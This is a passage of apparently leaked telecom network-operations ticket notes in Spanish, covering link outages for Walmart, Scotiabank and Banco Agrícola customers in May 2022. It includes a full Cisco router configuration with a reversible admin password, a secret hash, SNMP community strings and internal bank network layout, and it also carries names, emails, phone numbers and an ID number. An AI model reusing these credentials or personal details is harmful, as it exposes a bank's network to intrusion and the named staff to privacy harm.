CC: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;
ASUNTO: RE: ENLACE CAÍDO DE DF SONZACATE NORTE ID: IP2170017
ESTIMADOS BUEN DÍA,
EN SEGUIMIENTO DEL CASO, SE HA CONTACTADO CON PUNTO REMOTO Y ATIENDE MARGARITA RAMÍREZ, NOS COMENTA QUE DESEA MEJOR SE REALICE VISITA AL SITIO. FAVOR DE APOYARNOS EN REALIZAR LA GESTIÓN Y AUTORIZACIÓN DE ACCESOS PARA EL PERSONAL DESCRITO A CONTINUACIÓN:
DUI: 02726611-4
NOMBRE: FERNANDO LINARES
CUALQUIER DUDA O COMENTARIO QUEDO A LA ORDEN,
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t xml:space="preserve"> *** SE ENVÍA CORREO A CLIENTE SOLICITANDO AUTORIZACIÓN DE ACCESOS, A LA ESPERA DE CONFIRMACIÓN DE LOS MISMOS ***
DE: ANGEL DANIEL TORRES AJTUN &lt;ANGEL.TORRES@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 12 DE MAYO DE 2022 7:28
PARA: NOE PEREZ &lt;NOE.PEREZ1@WALMART.COM&gt;; CORPOWALMART &lt;CORPOWALMART@CLARO.COM.GT&gt;; VICTOR NUNEZ (VENDOR) &lt;VICTOR.NUNEZ2@WALMART.COM&gt;; ERICK ORELLANA (VENDOR) &lt;ERICK.ORELLANA0@WALMART.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;
ASUNTO: RE: ENLACE CAÍDO DE DF LO DE REYES ID: 344400263
ESTIMADOS BUEN DÍA,
EN SEGUIMIENTO DEL CASO, SE HA CONTACTADO CON PUNTO REMOTO Y ATIENDE MARGARITA RAMÍREZ, NOS COMENTA QUE DESEA MEJOR SE REALICE VISITA AL SITIO. FAVOR DE APOYARNOS EN REALIZAR LA GESTIÓN Y AUTORIZACIÓN DE ACCESOS PARA EL PERSONAL DESCRITO A CONTINUACIÓN:
DUI: 02726611-4
NOMBRE: FERNANDO LINARES
CUALQUIER DUDA O COMENTARIO QUEDO A LA ORDEN,
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 2243-7253 CONTESTA EL SEÑOR DIEGO MORA INFORMA QUE YA ESTARA APOYANDO CON LOS ACCESOS Y NOS ESTARA RESPONDIENDO POR CORREO**
ID 1001914055
**</t>
  </si>
  <si>
    <t>F4560845</t>
  </si>
  <si>
    <t>SE REENVIA CORREO, SE QUEDA A ESPERA DE RESPUESTA.
DE: LUVY ESAU SANDOVAL MATEO &lt;LUVY.SANDOVAL@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 12 DE MAYO DE 2022 10:25
PARA: ELVYN ARIEL LOPEZ RECINOS &lt;ELVYN.LOPEZ@CLARO.COM.GT&gt;; EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; ESTRADA BUSTOS VICTOR MANUEL &lt;VEBUSTOS@UNINET.COM.MX&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SCOTIABANK INTERNACIONAL - PANAMA INT TORRE LAS AMERICAS -PA-MNCSCT0001IN-TDA - PACKETS LOSS | IMSCI002733
++SE REENVIA CORREO</t>
  </si>
  <si>
    <t xml:space="preserve">
SE RECIBE CORREO DE CLIENTE,  INDICANDO QUE CASO YA ESTA CERRADO POR LO QUE SE PROCEDE A CIERRE DE TICKET.
DE: RUIZ GARCÍA KARINA &lt;KRUIZ@UNINET.COM.MX&gt;
ENVIADO: JUEVES, 12 DE MAYO DE 2022 15:42
PARA: LUVY ESAU SANDOVAL MATEO &lt;LUVY.SANDOVAL@CLARO.COM.GT&gt;; ELVYN ARIEL LOPEZ RECINOS &lt;ELVYN.LOPEZ@CLARO.COM.GT&gt;; EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; ESTRADA BUSTOS VICTOR MANUEL &lt;VEBUSTOS@UNINET.COM.MX&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SCOTIABANK INTERNACIONAL - PANAMA INT TORRE LAS AMERICAS -PA-MNCSCT0001IN-TDA - PACKETS LOSS | IMSCI002733
BUENAS TARDES ESTIMADO RAÚL,
COMO LO COMENTAMOS EN LÍNEA, EL TICKET IMSCI002733 YA ESTA CERRADO.
GRACIAS POR SU APOYO,</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE TELMEX, RESPONDE KARINA RUIZ, INDICA QUE REPONDERA A CORREO.
2001071612
COLA:
NOMBRE: A: 00525551745299
NÚMERO: 00525551745299
DURACIÓN: 0:03:42
ESTADO: CONECTADA
DETALLES: 00525551745299
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 12/05/2022 15:42:14</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 52 55 5174 5299 CONTESTA EL SEÑOR CRISTIAN E INDICA QUE NO HAN RECIBIDO NINGUN CORREO, SOLICITA QUE SE LE REENVIE EL CORREO PARA PODERNOS RESPONDER || SE NOTIFICA A GESTOR **
ID 1001915489
**</t>
  </si>
  <si>
    <t>F4560938</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ESTEBAN CHUTAN 58791030 PARA BRINDARLE RETROALIMENTACION PERO CLIENTE MENCIONA QUE EL SERVICIO YA RESTABLECIO LUEGO DEL REINICIO EN LOS EQUIPOS
SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 1001929660</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ESTEBAN CHUTAN 58791030 PARA INDICAR QUE SI ES NECESARIA LA VISITA TECNICA
-ID 1001931764</t>
  </si>
  <si>
    <t>F4560956</t>
  </si>
  <si>
    <t>/*/*/*/*/CLIENTE PABLO SALAZAR SOLICITA AVANCES, SE LE INDICA QUE EN LAS PRUEBAS LOGÍCAS TODO NOS REFLEJA QUE ESTA BIEN EL SERVICIO, SE TIENE EQUIPO ASOCIADO, CON SALIDA A INTERNET Y SIN PERDIDAS DE PAQUETES, POR LO QUE INDICA QUE PROCEDERÁ A REALIZAR PRUEBAS*/*/*/*/SEGÚN CRONOLOGIA DEL  12/05/2022 08:20:08 CLIENTE ESTA EN CONFERENCIA CON EL GESTOR, POR LO QUE NO APLICA PC, SE CAMBIA DE ESTADO*/*/*/*</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE WAGNER RAMOS 54764939 MENCIONA QUE PERSISTE EL INCONVENIENTE, SE DEJA EN CONFERENCIA CON GESTOR
-ID 1001918511</t>
  </si>
  <si>
    <t>F4560958</t>
  </si>
  <si>
    <t>SE ENVIO CORREO A CLIENTE CON PRUEBAS.
JURGEN RENE BOCH CAAL
JUE 12/05/2022 8:34
BUEN DÍA,
ESTIMADO CLIENTE, POR ESTE MEDIO LE INFORMAMOS QUE SE VALIDO EL ENLACE CON ID:  4914950, Y OBSERVAMOS QUE ESTA ACTIVO Y ESTABLE, NO SE OBSERVAN PERDIDA DE PAQUETES NI TIEMPOS ALTOS, SE VALIDO LOS NIVELES DE POTENCIA DE FIBRA OPTICA Y SON CORRECTOS, ADICIONAL NO SE OBSERVAN CAÍDAS EN EL MEDIO. PODRÍA VALIDAR POR FAVOR O ENVIAR MAYOR DETALLE CON RESPECTO A ESTE ENLACE.
FO
 *. TX OPTICAL POWER                        (-10.2 DBM)
 *. RX OPTICAL POWER                        (-12.6 DBM)
.</t>
  </si>
  <si>
    <t>F4560962</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 13 DE MAYO DE 2022 8:26
PARA: CORPORATIVOS, CLIENTES &lt;CLIENTESCORPORATIVOS@CLARO.COM.SV&gt;; RAUL IVAN AVALOZ BUENDIA &lt;RAVALOZ@BANCOAGRICOLA.COM.SV&gt;
CC: ENLACES &lt;ENLACES@BANCOAGRICOLA.COM.SV&gt;; SOPORTEL2COBA &lt;SOPORTEL2COBA@BANCOLOMBIA.ONMICROSOFT.COM&gt;; MONITOREOCOBA &lt;MONITOREOCOBA@BANCOLOMBIA.ONMICROSOFT.COM&gt;; MESA DE SERVICIO &lt;MESADESERVICIO@BANCOAGRICOLA.COM.SV&gt;
ASUNTO: RE: TICKET#20484378 ¿ EL NODO AG_JIQUILISCO-CL-IP2172017 SE ENCUENTRA DOWN
BUEN DÍA
    ESTIMADO CLIENTE DANDO SEGUIMIENTO AL CASO, SOLICITAMOS DE SU APOYO VALIDANDO COMO OBSERVA EL SERVICIO ACTUALMENTE, YA QUE EL MISMO SE ENCUENTRA OPERATIVO Y ESTABLE, QUEDAMOS ATENTOS A SUS COMENTARIOS.
CUALQUIER CONSULTA, A LA ORDEN.
*-*-*-*</t>
  </si>
  <si>
    <t xml:space="preserve">
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO SE DEJA EN ETAPA PENDIENTE CLIENTE Y SE EESPERA LA RESPUESTA POR PARTE DEL CLIENTE .
ROUTER CPE ACTIVO HACE 2 AÑOS.
CISCO IOS SOFTWARE, C1900 SOFTWARE (C1900-UNIVERSALK9-M), VERSION 15.4(3)M3, RELEASE SOFTWARE (FC2)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2015 BY CISCO SYSTEMS, INC.
COMPILED FRI 05-JUN-15 12:31 BY PROD_REL_TEAM
ROM: SYSTEM BOOTSTRAP, VERSION 15.0(1R)M16, RELEASE SOFTWARE (FC1)
IP2172017 UPTIME IS 2 YEARS, 32 WEEKS, 1 DAY, 6 HOURS, 34 MINUTES
SYSTEM RETURNED TO ROM BY POWER-ON
SYSTEM IMAGE FILE IS "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131L0UM
2 GIGABIT ETHERNET INTERFACES
1 TERMINAL LINE
1 VIRTUAL PRIVATE NETWORK (VPN) MODULE
DRAM CONFIGURATION IS 64 BITS WIDE WITH PARITY DISABLED.
255K BYTES OF NON-VOLATILE CONFIGURATION MEMORY.
245448K BYTES OF ATA SYSTEM COMPACTFLASH 0 (READ/WRITE)
LICENSE INFO:
LICENSE UDI:
-------------------------------------------------
DEVICE#	  PID			SN
-------------------------------------------------
*1  	  CISCO1941/K9          FJC2131L0UM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IP2172017#
CONFIGURACION DEL CPE:
SHOW RUNN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 15910 BYTES
!
! LAST CONFIGURATION CHANGE AT 17:31:11 GMT THU FEB 18 2021 BY T3LN0CR3D3S
!
VERSION 15.4
SERVICE NAGLE
NO SERVICE PAD
SERVICE TCP-KEEPALIVES-IN
SERVICE TCP-KEEPALIVES-OUT
SERVICE TIMESTAMPS DEBUG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE TIMESTAMPS LOG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE PASSWORD-ENCRYPTION
!
HOSTNAME IP2172017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IP FLOW-CACHE TIMEOUT ACTIVE 1
NO IP BOOTP SERVER
IP DOMAIN NAME TELECOM.COM.SV
IP CEF
NO IPV6 CEF
!
MULTILINK BUNDLE-NAME AUTHENTICATED
!
CTS LOGGING VERBOSE
!
!
LICENSE UDI PID CISCO1941/K9 SN FJC2131L0UM
!
!
USERNAME T3LN0CR3D3S PRIVILEGE 15 PASSWORD 7 01075508555B055D711C16
USERNAME AGRICOLA PRIVILEGE 15 VIEW AGRICOLA SECRET 5 $1$XIVH$QZ7BU49TXWMYRJE8YXQ6S/
!
REDUNDANCY
!
!
!
!
NO CDP RUN
!
IP TCP SYNWAIT-TIME 10
!
!
!
!
!
!
!
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.166.0.125 255.255.255.255
!
INTERFACE LOOPBACK13
 DESCRIPTION MONITOREO-BA-GBM
 IP ADDRESS 10.55.42.88 255.255.255.255
!
INTERFACE EMBEDDED-SERVICE-ENGINE0/0
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0/0
 DESCRIPTION WAN PRINCIPAL/_/IP2172017SV/_/
 BANDWIDTH 3072
 IP ADDRESS 10.138.83.42 255.255.255.248
 RATE-LIMIT INPUT 3072000 576000 1152000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 RATE-LIMIT OUTPUT 3072000 576000 1152000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 DUPLEX AUTO
 SPEED AUTO
!
INTERFACE GIGABITETHERNET0/1
 DESCRIPTION LAN DEL CLIENTE
 IP ADDRESS 10.55.40.137 255.255.255.252
 IP FLOW INGRESS
 IP FLOW EGRESS
 DUPLEX AUTO
 SPEED AUTO
 BRIDGE-GROUP 1
!
IP FORWARD-PROTOCOL ND
!
NO IP HTTP SERVER
NO IP HTTP SECURE-SERVER
IP FLOW-EXPORT SOURCE GIGABITETHERNET0/1
IP FLOW-EXPORT VERSION 5
IP FLOW-EXPORT DESTINATION 10.55.197.38 2055
IP FLOW-TOP-TALKERS
 TOP 25
 SORT-BY BYTES
 CACHE-TIMEOUT 30000
!
IP ROUTE 0.0.0.0 0.0.0.0 10.138.83.41 NAME DEFAULT
IP ROUTE 10.55.42.89 255.255.255.255 10.55.40.138 NAME LOOPBACK
IP ROUTE 10.55.83.128 255.255.255.128 10.55.40.138 NAME TELEFONIA
IP ROUTE 10.145.2.96 255.255.255.240 10.55.40.138 NAME ATM-KIOSCO
IP ROUTE 10.145.41.128 255.255.255.192 10.55.40.138 NAME VIDEO
IP ROUTE 172.19.109.64 255.255.255.192 10.55.40.138 NAME LAN
!
IP ACCESS-LIST STANDARD SNMP_GESTION
 PERMIT 10.55.197.38
 PERMIT 10.55.197.30
 PERMIT 10.55.197.19
!
IP ACCESS-LIST EXTENDED ATMS
 DENY   IP 10.145.2.96 0.0.0.15 172.19.109.64 0.0.0.63
 DENY   IP 10.145.2.96 0.0.0.15 10.145.41.128 0.0.0.63
 DENY   IP 10.145.2.96 0.0.0.15 10.55.83.128 0.0.0.127
 DENY   IP 10.145.2.96 0.0.0.15 192.168.225.200 0.0.0.7
 PERMIT IP ANY ANY
IP ACCESS-LIST EXTENDED DATOS
 DENY   IP 172.19.109.64 0.0.0.63 10.145.2.96 0.0.0.15
 DENY   IP 172.19.109.64 0.0.0.63 10.145.41.128 0.0.0.63
 DENY   IP 172.19.109.64 0.0.0.63 192.168.225.200 0.0.0.7
 PERMIT IP ANY ANY
IP ACCESS-LIST EXTENDED VIDEO
 DENY   IP 10.145.41.128 0.0.0.63 172.19.109.64 0.0.0.63
 DENY   IP 10.145.41.128 0.0.0.63 10.145.2.96 0.0.0.15
 DENY   IP 10.145.41.128 0.0.0.63 10.55.83.128 0.0.0.127
 DENY   IP 10.145.41.128 0.0.0.63 192.168.225.200 0.0.0.7
 PERMIT IP ANY ANY
IP ACCESS-LIST EXTENDED VIDEOMASFERRER
 PERMIT IP HOST 172.19.0.15 10.145.41.128 0.0.0.63
 PERMIT IP HOST 172.19.11.148 10.145.41.128 0.0.0.63
 PERMIT IP HOST 172.19.11.172 10.145.41.128 0.0.0.63
 PERMIT IP HOST 172.19.11.236 10.145.41.128 0.0.0.63
 PERMIT IP HOST 172.19.11.241 10.145.41.128 0.0.0.63
 PERMIT IP HOST 172.19.11.247 10.145.41.128 0.0.0.63
 PERMIT IP HOST 172.19.113.21 10.145.41.128 0.0.0.63
 PERMIT IP HOST 172.19.113.25 10.145.41.128 0.0.0.63
 PERMIT IP HOST 172.19.113.44 10.145.41.128 0.0.0.63
 PERMIT IP HOST 172.19.113.57 10.145.41.128 0.0.0.63
 PERMIT IP HOST 172.19.113.58 10.145.41.128 0.0.0.63
 PERMIT IP HOST 172.19.113.59 10.145.41.128 0.0.0.63
 PERMIT IP HOST 172.19.113.60 10.145.41.128 0.0.0.63
 PERMIT IP HOST 172.19.113.78 10.145.41.128 0.0.0.63
 PERMIT IP HOST 172.19.113.94 10.145.41.128 0.0.0.63
 PERMIT IP HOST 172.19.113.111 10.145.41.128 0.0.0.63
 PERMIT IP HOST 172.19.113.114 10.145.41.128 0.0.0.63
 PERMIT IP HOST 172.19.113.115 10.145.41.128 0.0.0.63
 PERMIT IP HOST 172.19.113.116 10.145.41.128 0.0.0.63
 PERMIT IP HOST 172.19.113.126 10.145.41.128 0.0.0.63
 PERMIT IP HOST 172.26.14.35 10.145.41.128 0.0.0.63
 PERMIT IP HOST 172.26.14.48 10.145.41.128 0.0.0.63
 PERMIT IP HOST 172.26.14.56 10.145.41.128 0.0.0.63
 PERMIT IP HOST 172.26.14.90 10.145.41.128 0.0.0.63
 PERMIT IP HOST 172.26.14.186 10.145.41.128 0.0.0.63
 PERMIT IP HOST 172.26.14.183 10.145.41.128 0.0.0.63
 PERMIT IP HOST 10.55.201.107 10.145.41.128 0.0.0.63
 PERMIT IP HOST 172.26.14.235 10.145.41.128 0.0.0.63
 PERMIT IP HOST 172.32.0.49 10.145.41.128 0.0.0.63
 PERMIT IP HOST 172.32.0.108 10.145.41.128 0.0.0.63
 PERMIT IP 10.145.21.0 0.0.0.63 10.145.41.128 0.0.0.63
 PERMIT IP HOST 172.17.16.221 10.145.41.128 0.0.0.63
 PERMIT IP HOST 172.17.16.222 10.145.41.128 0.0.0.63
 PERMIT IP HOST 172.17.16.223 10.145.41.128 0.0.0.63
 PERMIT IP HOST 172.17.16.224 10.145.41.128 0.0.0.63
 PERMIT IP HOST 172.17.16.225 10.145.41.128 0.0.0.63
 PERMIT IP HOST 172.17.16.226 10.145.41.128 0.0.0.63
 PERMIT IP HOST 172.17.16.227 10.145.41.128 0.0.0.63
 PERMIT IP HOST 172.17.16.228 10.145.41.128 0.0.0.63
 PERMIT IP HOST 172.17.16.229 10.145.41.128 0.0.0.63
 PERMIT IP HOST 172.17.16.230 10.145.41.128 0.0.0.63
 PERMIT IP HOST 172.17.16.231 10.145.41.128 0.0.0.63
 PERMIT IP HOST 172.17.16.232 10.145.41.128 0.0.0.63
 PERMIT IP HOST 172.17.11.202 10.145.41.128 0.0.0.63
 PERMIT IP HOST 172.17.11.203 10.145.41.128 0.0.0.63
 PERMIT IP HOST 172.17.11.204 10.145.41.128 0.0.0.63
 PERMIT IP HOST 172.17.11.205 10.145.41.128 0.0.0.63
 PERMIT IP HOST 172.17.11.206 10.145.41.128 0.0.0.63
 PERMIT IP HOST 172.17.11.207 10.145.41.128 0.0.0.63
 PERMIT IP HOST 172.17.11.208 10.145.41.128 0.0.0.63
 PERMIT IP HOST 172.17.11.209 10.145.41.128 0.0.0.63
 PERMIT IP HOST 172.17.11.210 10.145.41.128 0.0.0.63
 PERMIT IP HOST 172.17.11.211 10.145.41.128 0.0.0.63
 PERMIT IP HOST 172.17.11.212 10.145.41.128 0.0.0.63
 PERMIT IP HOST 172.17.15.200 10.145.41.128 0.0.0.63
 PERMIT IP HOST 172.17.15.201 10.145.41.128 0.0.0.63
 PERMIT IP HOST 172.17.15.202 10.145.41.128 0.0.0.63
 PERMIT IP HOST 172.17.15.203 10.145.41.128 0.0.0.63
 PERMIT IP HOST 172.17.15.204 10.145.41.128 0.0.0.63
 PERMIT IP HOST 172.17.15.205 10.145.41.128 0.0.0.63
 PERMIT IP HOST 172.17.15.206 10.145.41.128 0.0.0.63
 PERMIT IP HOST 172.17.15.207 10.145.41.128 0.0.0.63
 PERMIT IP HOST 172.17.15.208 10.145.41.128 0.0.0.63
 PERMIT IP HOST 172.17.15.209 10.145.41.128 0.0.0.63
 PERMIT IP HOST 172.17.15.210 10.145.41.128 0.0.0.63
 PERMIT IP HOST 10.55.221.20 10.145.41.128 0.0.0.63
 PERMIT IP HOST 10.55.221.21 10.145.41.128 0.0.0.63
 PERMIT IP HOST 10.55.221.22 10.145.41.128 0.0.0.63
 PERMIT IP HOST 10.55.221.23 10.145.41.128 0.0.0.63
 PERMIT IP HOST 10.55.221.24 10.145.41.128 0.0.0.63
 PERMIT IP HOST 10.55.221.25 10.145.41.128 0.0.0.63
 PERMIT IP HOST 10.55.221.26 10.145.41.128 0.0.0.63
 PERMIT IP HOST 10.55.221.27 10.145.41.128 0.0.0.63
 PERMIT IP HOST 10.55.221.28 10.145.41.128 0.0.0.63
 PERMIT IP HOST 10.55.221.29 10.145.41.128 0.0.0.63
 PERMIT IP HOST 10.55.221.31 10.145.41.128 0.0.0.63
 PERMIT IP HOST 10.55.194.138 10.145.41.128 0.0.0.63
 PERMIT IP HOST 10.55.193.207 10.145.41.128 0.0.0.63
 PERMIT IP HOST 10.55.201.47 10.145.41.128 0.0.0.63
 DENY   IP ANY ANY LOG
IP ACCESS-LIST EXTENDED WINXP
 DENY   IP 192.168.162.24 0.0.0.7 10.145.2.96 0.0.0.15
 DENY   IP 192.168.162.24 0.0.0.7 10.145.41.128 0.0.0.63
 DENY   IP 192.168.162.24 0.0.0.7 192.168.225.200 0.0.0.7
 PERMIT IP ANY ANY
IP ACCESS-LIST EXTENDED CUARENTENA
 DENY   IP 192.168.225.200 0.0.0.7 172.19.109.64 0.0.0.63
 DENY   IP 192.168.225.200 0.0.0.7 10.145.2.96 0.0.0.15
 DENY   IP 192.168.225.200 0.0.0.7 10.145.41.128 0.0.0.63
 DENY   IP 192.168.225.200 0.0.0.7 10.55.83.128 0.0.0.127
 PERMIT IP ANY ANY
IP ACCESS-LIST EXTENDED VOZ
 DENY   IP 10.55.83.128 0.0.0.127 10.145.2.96 0.0.0.15
 DENY   IP 10.55.83.128 0.0.0.127 10.145.41.128 0.0.0.63
 DENY   IP 10.55.83.128 0.0.0.127 192.168.225.200 0.0.0.7
 PERMIT IP ANY ANY
!
LOGGING SOURCE-INTERFACE LOOPBACK5
!
!
SNMP-SERVER GROUP SNMP_G2 V3 AUTH READ SWINDS-RO WRITE SWINDS-WR ACCESS SNMP_GESTION
SNMP-SERVER VIEW SWINDS-RO ISO INCLUDED
SNMP-SERVER VIEW SWINDS-WR ISO INCLUDED
SNMP-SERVER COMMUNITY ESCW2KPU RO 97
SNMP-SERVER COMMUNITY MON000089D RO
SNMP-SERVER COMMUNITY NM15SNMPRO RO 88
SNMP-SERVER IFINDEX PERSIST
SNMP-SERVER TRAP-SOURCE LOOPBACK5
SNMP-SERVER ENABLE TRAPS SNMP AUTHENTICATION LINKDOWN LINKUP COLDSTART WARMSTART
SNMP-SERVER ENABLE TRAPS VRRP
SNMP-SERVER ENABLE TRAPS TRANSCEIVER ALL
SNMP-SERVER ENABLE TRAPS DS1
SNMP-SERVER ENABLE TRAPS CALL-HOME MESSAGE-SEND-FAIL SERVER-FAIL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
SNMP-SERVER ENABLE TRAPS OSPF CISCO-SPECIFIC STATE-CHANGE SHAMLINK NEIGHBOR
SNMP-SERVER ENABLE TRAPS OSPF CISCO-SPECIFIC ERRORS
SNMP-SERVER ENABLE TRAPS OSPF CISCO-SPECIFIC RETRANSMIT
SNMP-SERVER ENABLE TRAPS OSPF CISCO-SPECIFIC LSA
SNMP-SERVER ENABLE TRAPS LICENSE
SNMP-SERVER ENABLE TRAPS ENVMON
SNMP-SERVER ENABLE TRAPS FLASH INSERTION REMOVAL LOW-SPACE
SNMP-SERVER ENABLE TRAPS AUTH-FRAMEWORK SEC-VIOLATION AUTH-FAIL
SNMP-SERVER ENABLE TRAPS C3G
SNMP-SERVER ENABLE TRAPS ADSLLINE
SNMP-SERVER ENABLE TRAPS VDSL2LINE
SNMP-SERVER ENABLE TRAPS ICSUDSU
SNMP-SERVER ENABLE TRAPS ISDN CALL-INFORMATION
SNMP-SERVER ENABLE TRAPS ISDN LAYER2
SNMP-SERVER ENABLE TRAPS ISDN CHAN-NOT-AVAIL
SNMP-SERVER ENABLE TRAPS ISDN IETF
SNMP-SERVER ENABLE TRAPS DS0-BUSYOUT
SNMP-SERVER ENABLE TRAPS DS1-LOOPBACK
SNMP-SERVER ENABLE TRAPS ENERGYWISE
SNMP-SERVER ENABLE TRAPS VSTACK
SNMP-SERVER ENABLE TRAPS MAC-NOTIFICATION
SNMP-SERVER ENABLE TRAPS TRUSTSEC-SXP CONN-SRCADDR-ERR MSG-PARSE-ERR CONN-CONFIG-ERR BINDING-ERR CONN-UP CONN-DOWN BINDING-EXPN-FAIL OPER-NODEID-CHANGE BINDING-CONFLICT
SNMP-SERVER ENABLE TRAPS BGP CBGP2
SNMP-SERVER ENABLE TRAPS ISIS
SNMP-SERVER ENABLE TRAPS OSPFV3 STATE-CHANGE
SNMP-SERVER ENABLE TRAPS OSPFV3 ERRORS
SNMP-SERVER ENABLE TRAPS AAA_SERVER
SNMP-SERVER ENABLE TRAPS ATM SUBIF
SNMP-SERVER ENABLE TRAPS CEF RESOURCE-FAILURE PEER-STATE-CHANGE PEER-FIB-STATE-CHANGE INCONSISTENCY
SNMP-SERVER ENABLE TRAPS MEMORY BUFFERPEAK
SNMP-SERVER ENABLE TRAPS CNPD
SNMP-SERVER ENABLE TRAPS CONFIG-COPY
SNMP-SERVER ENABLE TRAPS CONFIG
SNMP-SERVER ENABLE TRAPS CONFIG-CTID
SNMP-SERVER ENABLE TRAPS ENTITY-EXT
SNMP-SERVER ENABLE TRAPS ENTITY
SNMP-SERVER ENABLE TRAPS FRU-CTRL
SNMP-SERVER ENABLE TRAPS RESOURCE-POLICY
SNMP-SERVER ENABLE TRAPS EVENT-MANAGER
SNMP-SERVER ENABLE TRAPS FRAME-RELAY MULTILINK BUNDLE-MISMATCH
SNMP-SERVER ENABLE TRAPS FRAME-RELAY
SNMP-SERVER ENABLE TRAPS FRAME-RELAY SUBIF
SNMP-SERVER ENABLE TRAPS HSRP
SNMP-SERVER ENABLE TRAPS IPMULTICAST
SNMP-SERVER ENABLE TRAPS MEMPOOL
SNMP-SERVER ENABLE TRAPS MSDP
SNMP-SERVER ENABLE TRAPS MVPN
SNMP-SERVER ENABLE TRAPS NHRP NHS
SNMP-SERVER ENABLE TRAPS NHRP NHC
SNMP-SERVER ENABLE TRAPS NHRP NHP
SNMP-SERVER ENABLE TRAPS NHRP QUOTA-EXCEEDED
SNMP-SERVER ENABLE TRAPS PIM NEIGHBOR-CHANGE RP-MAPPING-CHANGE INVALID-PIM-MESSAGE
SNMP-SERVER ENABLE TRAPS PPPOE
SNMP-SERVER ENABLE TRAPS CPU THRESHOLD
SNMP-SERVER ENABLE TRAPS RSVP
SNMP-SERVER ENABLE TRAPS SYSLOG
SNMP-SERVER ENABLE TRAPS L2TUN SESSION
SNMP-SERVER ENABLE TRAPS L2TUN PSEUDOWIRE STATUS
SNMP-SERVER ENABLE TRAPS VTP
SNMP-SERVER ENABLE TRAPS WAAS
SNMP-SERVER ENABLE TRAPS ETHERNET CFM CC MEP-UP MEP-DOWN CROSS-CONNECT LOOP CONFIG
SNMP-SERVER ENABLE TRAPS ETHERNET CFM CROSSCHECK MEP-MISSING MEP-UNKNOWN SERVICE-UP
SNMP-SERVER ENABLE TRAPS IPSLA
SNMP-SERVER ENABLE TRAPS BFD
SNMP-SERVER ENABLE TRAPS GDOI GM-START-REGISTRATION
SNMP-SERVER ENABLE TRAPS GDOI GM-REGISTRATION-COMPLETE
SNMP-SERVER ENABLE TRAPS GDOI GM-RE-REGISTER
SNMP-SERVER ENABLE TRAPS GDOI GM-REKEY-RCVD
SNMP-SERVER ENABLE TRAPS GDOI GM-REKEY-FAIL
SNMP-SERVER ENABLE TRAPS GDOI KS-REKEY-PUSHED
SNMP-SERVER ENABLE TRAPS GDOI GM-INCOMPLETE-CFG
SNMP-SERVER ENABLE TRAPS GDOI KS-NO-RSA-KEYS
SNMP-SERVER ENABLE TRAPS GDOI KS-NEW-REGISTRATION
SNMP-SERVER ENABLE TRAPS GDOI KS-REG-COMPLETE
SNMP-SERVER ENABLE TRAPS FIREWALL SERVERSTATUS
SNMP-SERVER ENABLE TRAPS IKE POLICY ADD
SNMP-SERVER ENABLE TRAPS IKE POLICY DELETE
SNMP-SERVER ENABLE TRAPS IKE TUNNEL START
SNMP-SERVER ENABLE TRAPS IKE TUNNEL STOP
SNMP-SERVER ENABLE TRAPS IPSEC CRYPTOMAP ADD
SNMP-SERVER ENABLE TRAPS IPSEC CRYPTOMAP DELETE
SNMP-SERVER ENABLE TRAPS IPSEC CRYPTOMAP ATTACH
SNMP-SERVER ENABLE TRAPS IPSEC CRYPTOMAP DETACH
SNMP-SERVER ENABLE TRAPS IPSEC TUNNEL START
SNMP-SERVER ENABLE TRAPS IPSEC TUNNEL STOP
SNMP-SERVER ENABLE TRAPS IPSEC TOO-MANY-SAS
SNMP-SERVER ENABLE TRAPS RF
SNMP-SERVER ENABLE TRAPS BULKSTAT COLLECTION TRANSFER
SNMP-SERVER ENABLE TRAPS VRFMIB VRF-UP VRF-DOWN VNET-TRUNK-UP VNET-TRUNK-DOWN
SNMP-SERVER ENABLE TRAPS ETHERNET CFM ALARM
SNMP-SERVER HOST 10.55.197.38 VERSION 3 AUTH MONBCOAGRICOLA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
!
